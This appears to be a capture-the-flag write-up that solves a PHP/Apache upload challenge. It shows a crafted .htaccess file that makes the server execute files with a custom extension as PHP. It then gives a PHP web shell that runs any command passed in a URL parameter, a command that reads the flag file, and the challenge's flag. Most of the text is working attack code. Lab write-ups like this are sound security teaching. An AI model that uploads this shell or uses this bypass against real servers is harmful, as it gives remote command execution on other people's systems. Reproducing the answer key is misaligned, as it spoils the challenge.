← Back
PHP-Apache-configuration | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

Here we can’t upload .php files. However, we can upload .htaccess and by this way do some nasty staff.

This will be our .htaccess file:

# Enable indexing
Options +Indexes 

# Treat .rce as .php
AddType application/x-httpd-php .rce

# Enable php execution
php_flag engine on

htaccess upload

Then, we’ll upload our webshell.rce file, which is

<?php
if (isset($_GET['cmd'])) {
    echo "<pre>" . system($_GET['cmd']) . "</pre>";
}
?>

webshell upload

And now, cat the password. This will be our payload: cat /var/www/html/private/flag.txt FINAL FLAG

Flag: ht@cc3ss2RCE4th%w1n